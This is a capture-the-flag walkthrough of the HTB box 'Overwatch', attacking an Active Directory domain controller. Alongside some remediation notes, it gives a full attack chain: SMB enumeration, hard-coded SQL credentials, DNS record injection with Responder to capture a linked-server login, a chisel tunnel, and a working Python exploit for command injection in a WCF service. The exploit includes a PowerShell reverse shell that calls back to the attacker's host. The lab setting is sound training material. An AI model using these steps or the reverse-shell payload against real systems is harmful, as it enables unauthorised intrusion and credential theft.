└─$ nmap -sC -sV 10.129.1.202
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 08:14 -0500
Nmap scan report for 10.129.1.202
Host is up (0.37s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-21 13:15:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-02-21T13:16:50+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
|_Not valid after: 2026-06-08T15:16:06
| rdp-ntlm-info:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
| Product_Version: 10.0.20348
|_ System_Time: 2026-02-21T13:16:13+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-02-21T13:16:12
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Back to back we also run a more aggressive scan (-A) across all 65535 ports to catch anything outside the top 1000:
└─$ nmap -sC -sV -A -p- 10.129.1.202
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-21 08:19 -0500
Nmap scan report for 10.129.1.202
Host is up (0.58s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNS-SD-TCP:
| _services
| _dns-sd
| _udp
|_ local
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-21 13:40:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
|_Not valid after: 2026-06-08T15:16:06
|_ssl-date: 2026-02-21T13:42:07+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
| Product_Version: 10.0.20348
|_ System_Time: 2026-02-21T13:41:28+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6520/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-02-21T13:15:49
|_Not valid after: 2056-02-21T13:15:49
| ms-sql-info:
| 10.129.1.202:6520:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 6520
| ms-sql-ntlm-info:
| 10.129.1.202:6520:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
|_ Product_Version: 10.0.20348
|_ssl-date: 2026-02-21T13:42:07+00:00; -1s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
60617/tcp open msrpc Microsoft Windows RPC
61741/tcp open msrpc Microsoft Windows RPC
62165/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
62166/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data.
The full scan shows the extra open ports: 6520 (SQL Server 2022 on a non-default port), 9389 (Active Directory Web Services) and a set of RPC high ports.
STEP II: Next we try enum4linux for user and group information, but without credentials it returns nothing useful. So we list the shares with smbclient using a null session (-N):
└─$ smbclient -L 10.129.1.202 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
software$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.1.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The null session lists the shares; the SMB1 workgroup fallback fails, which is harmless. Next we check the permissions on each share with smbmap, logging in as the anonymous user with an empty password:
└─$ smbmap -H 10.129.1.202 -u "anonymous" -p ""
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports...
[-] Initializing hosts...
[|] Enumerating shares...
[+] IP: 10.129.1.202:445 Name: 10.129.1.202 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
software$ READ ONLY
SYSVOL NO ACCESS Logon server share
[|] Closing connections..
The anonymous login is accepted (mapped to guest) and shows the share permissions: IPC$ and software$ are readable, everything else is denied.
STEP III: Now we connect with smbclient to the readable shares (IPC$, software$). software$ is the interesting one:
└─$ smbclient //10.129.1.202/software$ -N
Try "help" to get a list of possible commands.
smb: \> ls
. DH 0 Fri May 16 21:27:07 2025
.. DHS 0 Thu Jan 1 01:46:47 2026
Monitoring DH 0 Fri May 16 21:32:43 2025
7147007 blocks of size 4096. 1198276 blocks available
smb: \> cd Monitoring\
smb: \Monitoring\> ls
. DH 0 Fri May 16 21:32:43 2025
.. DH 0 Fri May 16 21:27:07 2025
EntityFramework.dll AH 4991352 Thu Apr 16 16:38:42 2020
EntityFramework.SqlServer.dll AH 591752 Thu Apr 16 16:38:56 2020
EntityFramework.SqlServer.xml AH 163193 Thu Apr 16 16:38:56 2020
EntityFramework.xml AH 3738289 Thu Apr 16 16:38:40 2020
Microsoft.Management.Infrastructure.dll AH 36864 Mon Jul 17 10:46:10 2017
overwatch.exe AH 9728 Fri May 16 21:19:24 2025
overwatch.exe.config AH 2163 Fri May 16 21:02:30 2025
overwatch.pdb AH 30208 Fri May 16 21:19:24 2025
System.Data.SQLite.dll AH 450232 Sun Sep 29 16:41:18 2024
System.Data.SQLite.EF6.dll AH 206520 Sun Sep 29 16:40:06 2024
System.Data.SQLite.Linq.dll AH 206520 Sun Sep 29 16:40:42 2024
System.Data.SQLite.xml AH 1245480 Sat Sep 28 14:48:00 2024
System.Management.Automation.dll AH 360448 Mon Jul 17 10:46:10 2017
System.Management.Automation.xml AH 7145771 Mon Jul 17 10:46:10 2017
x64 DH 0 Fri May 16 21:32:33 2025
x86 DH 0 Fri May 16 21:32:33 2025
7147007 blocks of size 4096. 1200654 blocks available
smb: \Monitoring\> get overwatch.exe
getting file \Monitoring\overwatch.exe of size 9728 as overwatch.exe (5.3 KiloBytes/sec) (average 5.3 KiloBytes/sec)
smb: \Monitoring\> get overwatch.exe.config
getting file \Monitoring\overwatch.exe.config of size 2163 as overwatch.exe.config (1.2 KiloBytes/sec) (average 3.2 KiloBytes/sec)
smb: \Monitoring\> get overwatch.pdb
getting file \Monitoring\overwatch.pdb of size 30208 as overwatch.pdb (14.3 KiloBytes/sec) (average 7.2 KiloBytes/sec)
smb: \Monitoring\> ^C
Now we have the files locally (fetched with get) and can analyse them.
STEP IV: We start with the text files (cat overwatch.exe.config):

The config contains a service URL, http://overwatch.htb:8000/MonitorService. Note that 8000/tcp was not open in either nmap scan; we keep the URL for later and move on to the other files.
overwatch.exe is a .NET assembly (it ships with EntityFramework and System.Management.Automation), so we decompile it and read the source.
I used dnSpy: https://github.com/dnSpy/dnSpy/releases
STEP V: The decompiled code contains a hard-coded connection string with database credentials:

("Server=localhost;Database=SecurityLogs;
User Id=sqxxxc;Password=TI0LxxxxZw1Vv;")
STEP VI: We try these credentials against the SQL Server instance the full port scan found on 6520/tcp (ms-sql-s, Microsoft SQL Server 2022 RTM, domain OVERWATCH):
└─$ impacket-mssqlclient -windows-auth overwatch.htb/<User>:'<Password>'@<Machine_IP> -p 6520
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(S200401\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(S200401\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (OVERWATCH\sqlsvc guest@master)>
We are connected as the sqlsvc login, mapped to guest in master. Two queries tell us what this login can see:
SELECT SYSTEM_USER;        -- the login we are authenticated as
SELECT * FROM sys.servers; -- linked servers known to this instance (not databases)
sys.servers returns two entries: the local instance and a linked server named SQL07.
S200401\SQLEXPRESS SQL Server SQLNCLI
SQL07 SQL Server SQLNCLI
Note: SQL Server's default port is 1433/tcp, but this named instance (SQLEXPRESS) listens on 6520, which is why -p 6520 was needed for mssqlclient.
STEP VII: We tried to reach SQL07 but got nothing, while S200401 resolves and responds. Asking the DC's own DNS confirms the linked server has no record:
└─$ dig @10.129.1.202 SQL07.overwatch.htb   # no answer: SQL07 does not exist in DNS
└─$ dig @10.129.1.202 S200401.overwatch.htb # works
STEP VIII: Since SQL07 has no A record, we can create one that points at our own host. In AD-integrated DNS, Authenticated Users can create new records in the zone by default, so any domain credential is enough. We use dnstool.py from krbrelayx, which Kali ships as dnstool:
└─$ dnstool
usage: dnstool.py [-h] [-u USERNAME] [-p PASSWORD] [--forest] [--legacy] [--zone ZONE] [--print-zones] [--print-zones-dn] [--tcp] [-k]
[-port port] [-force-ssl] [-dc-ip ip address] [-dns-ip ip address] [-aesKey hex key] [-r TARGETRECORD]
[-a {add,modify,query,remove,resurrect,ldapdelete}] [-t {A}] [-d RECORDDATA] [--allow-multiple] [--ttl TTL]
HOSTNAME
dnstool.py: error: the following arguments are required: HOSTNAME
└─$ dnstool -u OVERWATCH.HTB\\<User> -p '<Pass>' -r SQL07 -a add -t A -d <Attacker_IP> <Machine_IP>
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
STEP IX: We verify with dig; SQL07 now resolves to our tun0 address, so anything on the DC that talks to SQL07 will talk to us:
└─$ dig @10.129.1.202 SQL07.overwatch.htb
; <<>> DiG 9.20.18-1-Debian <<>> @10.129.1.202 SQL07.overwatch.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38028
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;SQL07.overwatch.htb. IN A
;; ANSWER SECTION:
SQL07.overwatch.htb. 180 IN A 10.10.16.29
;; Query time: 291 msec
;; SERVER: 10.129.1.202#53(10.129.1.202) (UDP)
;; WHEN: Sat Feb 21 10:15:59 EST 2026
;; MSG SIZE rcvd: 64
STEP X: With SQL07 resolving to our IP, any query executed AT [SQL07] makes S200401's linked-server provider open a TDS connection to us and authenticate with the credentials stored in the linked-server definition. We run Responder as a rogue MSSQL server to receive that login. The xp_dirtree path inside the query is irrelevant: the outbound connection and login happen before the remote query would be evaluated. Run this in the SQL session:
SQL (OVERWATCH\sqlsvc guest@master)> EXEC ('xp_dirtree ''\\SQL07.overwatch.htb\share''') AT [SQL07];
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Communication link failure".
ERROR(MSOLEDBSQL): Line 0: TCP Provider: An existing connection was forcibly closed by the remote host.
SQL (OVERWATCH\sqlsvc guest@master)>
EXEC ('xp_dirtree ''\\SQL07.overwatch.htb\share''') AT [SQL07]; -- run in the SQL session
STEP XI: In a second terminal start Responder first, then re-run the query above in the SQL session and watch Responder's output. The port 80/443 errors are only because other services already own those ports; the MSSQL listener (1433) is what we need:
sudo responder -I tun0   # run in the second terminal
[+] Listening for events...
[!] Error starting TCP server on port 80, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[MSSQL] Cleartext Client : 10.129.1.202
[MSSQL] Cleartext Hostname : SQL07 ()
[MSSQL] Cleartext Username : sqlxxxt
[MSSQL] Cleartext Password : bIhBbxxxnB82yx
[*] Skipping previously captured cleartext password for sqlmgmt
STEP XII: We now have a username and password. The same pair is accepted for a WinRM login on the DC (5985/tcp was open in the scan), so we connect with evil-winrm:
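Why Responder prints the password in cleartext, as an added example that is not part of the original write-up: a TDS LOGIN7 message protects a SQL-auth password only with a fixed byte transform defined in MS-TDS (swap the two nibbles of each byte, then XOR with 0xA5), so whoever receives an unencrypted LOGIN7 can reverse it. S200401 forced TLS on our own connection ("Encryption required, switching to TLS"), but its outbound linked-server login connected to whatever SQL07 resolved to and went ahead without encryption when the rogue server offered none. The script below builds a LOGIN7 packet the way a client does and parses it the way Responder does; the hostname, login and password inside it are constructed for the demo, not captured from the box.

```python
"""
Added example: TDS LOGIN7 password obfuscation, built and then recovered.
The credentials below are constructed for the demo, not from the target.
"""
import struct

TDS_LOGIN7 = 0x10          # TDS packet type of the LOGIN7 message
LOGIN7_FIXED_LEN = 94      # fixed fields + offset/length table (MS-TDS 2.2.6.4)


def obfuscate_tds7_password(password: str) -> bytes:
    """Client side: for each UTF-16LE byte, swap the nibbles, then XOR 0xA5."""
    out = bytearray()
    for b in password.encode("utf-16-le"):
        swapped = ((b << 4) & 0xF0) | ((b >> 4) & 0x0F)
        out.append(swapped ^ 0xA5)
    return bytes(out)


def deobfuscate_tds7_password(blob: bytes) -> str:
    """Receiver side (what Responder does): XOR 0xA5, then swap the nibbles back."""
    out = bytearray()
    for b in blob:
        x = b ^ 0xA5
        out.append(((x << 4) & 0xF0) | ((x >> 4) & 0x0F))
    return out.decode("utf-16-le")


def build_login7(hostname: str, username: str, password: str,
                 appname: str = "Microsoft SQL Server", server: str = "SQL07",
                 database: str = "master") -> bytes:
    """Build a TDS packet carrying a minimal SQL-authentication LOGIN7 message."""
    fields = [                                   # order of the offset/length table
        hostname.encode("utf-16-le"),            # HostName
        username.encode("utf-16-le"),            # UserName
        obfuscate_tds7_password(password),       # Password (obfuscated, same size)
        appname.encode("utf-16-le"),             # AppName
        server.encode("utf-16-le"),              # ServerName
        b"",                                     # Unused / Extension
        "ODBC".encode("utf-16-le"),              # CltIntName
        b"",                                     # Language
        database.encode("utf-16-le"),            # Database
    ]
    table, data, offset = b"", b"", LOGIN7_FIXED_LEN
    for f in fields:
        table += struct.pack("<HH", offset, len(f) // 2)   # byte offset, length in chars
        data += f
        offset += len(f)
    fixed = struct.pack("<IIIIII", 0, 0x74000004, 4096, 0x07000000, 1234, 0)  # Length (patched below), TDS 7.4, packet size, prog ver, PID, conn id
    fixed += bytes([0xE0, 0x03, 0x00, 0x00])      # OptionFlags1, OptionFlags2 (SQL auth), TypeFlags, OptionFlags3
    fixed += struct.pack("<iI", 0, 0x0409)        # ClientTimeZone, ClientLCID (en-US)
    fixed += table
    fixed += bytes.fromhex("001122334455")        # ClientID
    fixed += struct.pack("<HH", offset, 0) * 3    # SSPI, AtchDBFile, ChangePassword: all empty
    fixed += struct.pack("<I", 0)                 # cbSSPILong
    assert len(fixed) == LOGIN7_FIXED_LEN
    body = struct.pack("<I", LOGIN7_FIXED_LEN + len(data)) + fixed[4:] + data
    header = struct.pack(">BBHHBB", TDS_LOGIN7, 0x01, 8 + len(body), 0, 1, 0)  # type, EOM, length, SPID, packet id, window
    return header + body


def parse_login7(packet: bytes) -> dict:
    """Rogue-server side: pull host, user and the recovered password out of LOGIN7."""
    if packet[0] != TDS_LOGIN7:
        raise ValueError(f"not a LOGIN7 packet (type 0x{packet[0]:02x})")
    body = packet[8:]                    # strip the 8-byte TDS packet header
    table = body[36:72]                  # nine (offset, length) pairs follow the fixed fields

    def field(idx: int) -> bytes:
        off, cch = struct.unpack_from("<HH", table, idx * 4)
        return body[off:off + cch * 2]   # lengths are in UTF-16 characters

    return {
        "hostname": field(0).decode("utf-16-le"),
        "username": field(1).decode("utf-16-le"),
        "password": deobfuscate_tds7_password(field(2)),
    }


if __name__ == "__main__":
    pkt = build_login7("S200401", "sqlmgmt_demo", "Winter2026!")   # constructed sample
    print(parse_login7(pkt))
```

The server-side fix is to require encryption and certificate validation on the linked-server definition and not to store a privileged fixed login in it; the DNS-side fix is to stop Authenticated Users from creating records in the AD-integrated zone, which is what made the SQL07 record possible in the first place.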
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.1.202 -u <User> -p '<Pass>'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sqlmgmt\Documents> pwd
Path
----
C:\Users\sqlmgmt\Documents
Now we look for user.txt:
*Evil-WinRM* PS C:\Users\sqlmgmt> ls
Directory: C:\Users\sqlmgmt
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/16/2025 8:09 PM Desktop
d-r--- 5/16/2025 8:08 PM Documents
d-r--- 5/8/2021 1:20 AM Downloads
d-r--- 5/8/2021 1:20 AM Favorites
d-r--- 5/8/2021 1:20 AM Links
d-r--- 5/8/2021 1:20 AM Music
d-r--- 5/8/2021 1:20 AM Pictures
d----- 5/8/2021 1:20 AM Saved Games
d-r--- 5/8/2021 1:20 AM Videos
*Evil-WinRM* PS C:\Users\sqlmgmt> cd Desktop
*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> ls
Directory: C:\Users\sqlmgmt\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/21/2026 5:14 AM 34 user.txt
*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> type user.txt
<------------User-Flag----------->
STEP XIII: Next we look for the root flag in the Administrator profile, but access is denied:
*Evil-WinRM* PS C:\Users> cd Administrator
*Evil-WinRM* PS C:\Users\Administrator> ls
Access to the path 'C:\Users\Administrator' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\Administrator>
So we need to escalate privileges.
STEP XIV: The overwatch.exe.config pointed at http://overwatch.htb:8000/MonitorService, but 8000/tcp was not open in the full port scan, so the service is only reachable from the DC itself. To get to it we set up a reverse port forward with chisel (https://github.com/jpillora/chisel). First serve chisel.exe from the attacker machine and fetch it from the target (in PowerShell, wget is an alias for Invoke-WebRequest, hence the -UseBasicParsing/-OutFile parameters):
└─$ python3 -m http.server 8000   # on the attacker machine, in the directory holding chisel.exe
wget http://10.10.16.29:8000/chisel.exe -UseBasicParsing -OutFile chisel.exe   # in the evil-winrm session on the target
Stop the Python HTTP server once the download finishes: the chisel reverse forward below also binds port 8000 on the attacker machine and cannot start while http.server still owns it. The file is now on the target:
*Evil-WinRM* PS C:\Users\sqlmgmt\Documents> dir
Directory: C:\Users\sqlmgmt\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/21/2026 7:50 AM 10612224 chisel.exe
STEP XV: Start the chisel server on the attacker machine first (--reverse allows the client to request R: forwards), then start the client from the evil-winrm session. R:8000:127.0.0.1:8000 makes port 8000 on the attacker's loopback forward to port 8000 on the target's loopback, where the service listens:
chisel server --reverse --port <Custom_Port>   # attacker machine
./chisel.exe client <Attacker_IP>:<Custom_Port> R:8000:127.0.0.1:8000   # target, in the evil-winrm session
2026/02/21 08:26:38 client: Connected (Latency 315.5769ms)   # tunnel established
STEP XVI: In a browser on the attacker machine, open the URL from the config file, now reachable through the tunnel:
http://localhost:8000/MonitorService
OR
http://127.0.0.1:8000/MonitorService
STEP XVII: The page is a WCF service help page with two links to the service description. They use the overwatch.htb hostname, which does not go through our tunnel, so replace it with localhost (or 127.0.0.1) and read the WSDL:

http://localhost:8000/MonitorService?wsdl         # originally http://overwatch.htb:8000/MonitorService?wsdl
http://localhost:8000/MonitorService?singleWsdl   # originally http://overwatch.htb:8000/MonitorService?singleWsdl
STEP XVIII: The WSDL describes a MonitoringService with three operations, StartMonitoring, StopMonitoring and KillProcess, on a plain BasicHttpBinding with no authentication at all. KillProcess takes a caller-supplied process name. The exploit below terminates the intended command with ; and comments out the rest with #, i.e. the argument is spliced into a PowerShell command (the service ships System.Management.Automation.dll, the PowerShell hosting assembly). So the real issue is unauthenticated command injection in a privileged service, not only remote process termination.
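The injection pattern behind the KillProcess finding, modelled in Python as an added example (the real service is .NET and its source is not on this page; the Stop-Process command shape, the function names and the taskkill replacement are assumptions for illustration): a builder that splices the caller's process name into a PowerShell command string, beside a hardened version that accepts only plain image names and hands them to the OS as an argument vector rather than a shell string.

```python
"""
Added example: the KillProcess injection pattern and its fix, modelled in Python.
The command shape and names are assumptions; the payload is the write-up's test payload.
"""
import re
import subprocess

# Windows image names: letters, digits, dot, dash, underscore, at most 64 chars.
IMAGE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")

# The write-up's proof-of-injection payload (constructed input for the demo).
PAYLOAD = 'calc.exe; whoami > C:\\temp\\wcf_proof.txt; #'


def build_kill_command_vulnerable(process_name: str) -> str:
    """Assumed vulnerable shape: the argument is interpolated into a PowerShell string.
    With PAYLOAD this yields 'Stop-Process -Name calc.exe; whoami > ...; # -Force':
    ';' ends Stop-Process, the attacker's command runs, '#' comments out '-Force'."""
    return f"Stop-Process -Name {process_name} -Force"


def is_safe_image_name(process_name: str) -> bool:
    """True only for a bare image name; spaces, ';', '#', quotes and paths are rejected."""
    return IMAGE_NAME.fullmatch(process_name) is not None


def validate_image_name(process_name: str) -> str:
    if not is_safe_image_name(process_name):
        raise ValueError(f"rejected process name: {process_name!r}")
    return process_name


def build_kill_argv_hardened(process_name: str) -> list[str]:
    """Hardened shape: strict allow-list validation, then an argv, not a shell string.
    taskkill receives the name as one argument; no interpreter parses it."""
    name = validate_image_name(process_name)
    return ["taskkill", "/IM", name, "/F"]


def kill_process_hardened(process_name: str, dry_run: bool = True) -> list[str]:
    """Validate, build argv, optionally execute without a shell; returns the argv used."""
    argv = build_kill_argv_hardened(process_name)
    if not dry_run:
        subprocess.run(argv, shell=False, check=False)  # shell=False: no metacharacter parsing
    return argv


if __name__ == "__main__":
    print("vulnerable:", build_kill_command_vulnerable(PAYLOAD))
    print("hardened  :", kill_process_hardened("notepad.exe"))
    try:
        kill_process_hardened(PAYLOAD)
    except ValueError as err:
        print("hardened  :", err)
```

Validation alone is the wrong fix if the result is still concatenated into a PowerShell string; the argv form is what removes the interpreter from the path, and the validation is defence in depth. The other half of the finding, that the endpoint requires no authentication, is a WCF binding choice and would need a binding with transport or message security rather than BasicHttpBinding.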

STEP XIX: We exploit it with a small Python client built on zeep. The served WSDL references its schemas and endpoint by the overwatch.htb hostname, which does not lead through the tunnel from Kali, so we keep an edited copy (local.wsdl) whose imports point at two XSD files downloaded into a local schemas/ folder and whose soap:address points at 127.0.0.1:8000. Working directory layout:
~/Downloads/overwatch/
├── exploit.py            # main Python script using zeep
├── local.wsdl            # edited WSDL with LOCAL schema imports
├── overwatch.exe         # original binary from the share
├── overwatch.exe.config  # config file that contained the service URL
├── overwatch.pdb         # debug symbols (optional)
├── schemas/              # the two downloaded XSD files
│   ├── xsd0.xsd          # main schema: contains the KillProcess definition
│   └── xsd1.xsd          # Microsoft serialization types (basic types)
└── venv/                 # Python virtual environment
    ├── bin/
    ├── lib/
    └── ... (standard venv contents)
Save the following as exploit.py:
import sys
import requests
from zeep import Client
from zeep.transports import Transport

# Disable SSL warnings (not really needed over plain HTTP, but harmless)
requests.packages.urllib3.disable_warnings()

session = requests.Session()
session.verify = False
transport = Transport(session=session)

# Use the local, edited WSDL; its soap:address points at the chisel tunnel on 127.0.0.1:8000
client = Client('local.wsdl', transport=transport)
print("[*] Client created successfully!")
print("Services found in WSDL:", list(client.wsdl.services.keys()))

if not client.wsdl.services:
    print("No services at all -> check if <wsdl:service> exists in local.wsdl")
    raise ValueError("No services defined")

first_service_name = next(iter(client.wsdl.services))
print(f"First service name: {first_service_name}")
service_obj = client.wsdl.services[first_service_name]
print("Ports in first service:", list(service_obj.ports.keys()))

if not service_obj.ports:
    print("No ports found in service -> WSDL incomplete?")
    raise ValueError("No ports")

first_port_name = next(iter(service_obj.ports))
print(f"Using explicit service/port: {first_service_name} / {first_port_name}")
# Bind to that service/port explicitly (the original script then overwrote this with
# client.service, which only happened to work because the WSDL has a single port)
service = client.bind(service_name=first_service_name, port_name=first_port_name)

# Show what methods are actually available
print("[*] Client ready. Available methods:")
print([m for m in dir(service) if not m.startswith('_')])

print("\n[*] Trying to call KillProcess...\n")

# ────────────────────────────────────────────────────────────────
# TEST PAYLOAD (writes whoami to a file - safe & visible proof)
# ';' ends the command the service builds around our argument and '#' comments
# out whatever follows. C:\temp must exist on the target (mkdir it via evil-winrm).
# ────────────────────────────────────────────────────────────────
test_payload = 'calc.exe; whoami > C:\\temp\\wcf_proof.txt; echo SUCCESS >> C:\\temp\\wcf_proof.txt; #'
try:
    result = service.KillProcess(test_payload)
    print("[+] Test payload executed successfully!")
    print("Response from service:", result)
    print("\nOn the target machine (in evil-winrm):")
    print("  type C:\\temp\\wcf_proof.txt")
    print("  -> If you see your username + 'SUCCESS', the command injection works")
except Exception as e:
    print("[-] Test call failed:", str(e))
    print("  -> Possible fixes:")
    print("  - Check if 'KillProcess' is listed in the available methods above")
    print("  - Try service.MonitoringService.KillProcess or similar if the name differs")
    print("  - Make sure the chisel tunnel is still alive: curl http://127.0.0.1:8000/MonitorService")

# ────────────────────────────────────────────────────────────────
# REVERSE SHELL PAYLOAD - sent only when run as:  python3 exploit.py --shell
# (originally this part was not commented out, so both payloads fired on every run)
# BEFORE THAT: start the listener on Kali:  rlwrap nc -lvnp 4446
# ────────────────────────────────────────────────────────────────
if '--shell' not in sys.argv:
    print("\n[*] Re-run with --shell once the proof file appears to send the reverse shell.")
    sys.exit(0)

ip = "10.10.16.29"
port = 4446
rev = (
    f"$ErrorActionPreference='Continue'; "
    f"$client = New-Object System.Net.Sockets.TCPClient('{ip}',{port}); "
    f"$stream = $client.GetStream(); "
    f"[byte[]]$bytes = 0..65535|%{{0}}; "
    f"while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{ "
    f"  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); "
    f"  try {{ $sendback = (iex $data 2>&1 | Out-String ) }} "
    f"  catch {{ $sendback = $_.Exception.Message + \"`n\" }}; "
    f"  $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '; "
    f"  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); "
    f"  $stream.Write($sendbyte,0,$sendbyte.Length); "
    f"  $stream.Flush() "
    f"}}; "
    f"$client.Close()"
)
payload = f"notepad; {rev}; #"
try:
    result = service.KillProcess(payload)
    print("\n[+] Reverse shell payload sent!")
    print(f"Check your nc listener on port {port} for an incoming connection")
    print("Once connected, immediately type: whoami /all")
except Exception as e:
    print("[-] Reverse shell failed:", str(e))
Save the following as local.wsdl (the original WSDL with the two schema imports pointed at schemas/ and the soap:address pointed at the tunnel):
<?xml version="1.0" encoding="utf-8"?>
<wsdl:definitions name="MonitoringService" targetNamespace="http://tempuri.org/"
    xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
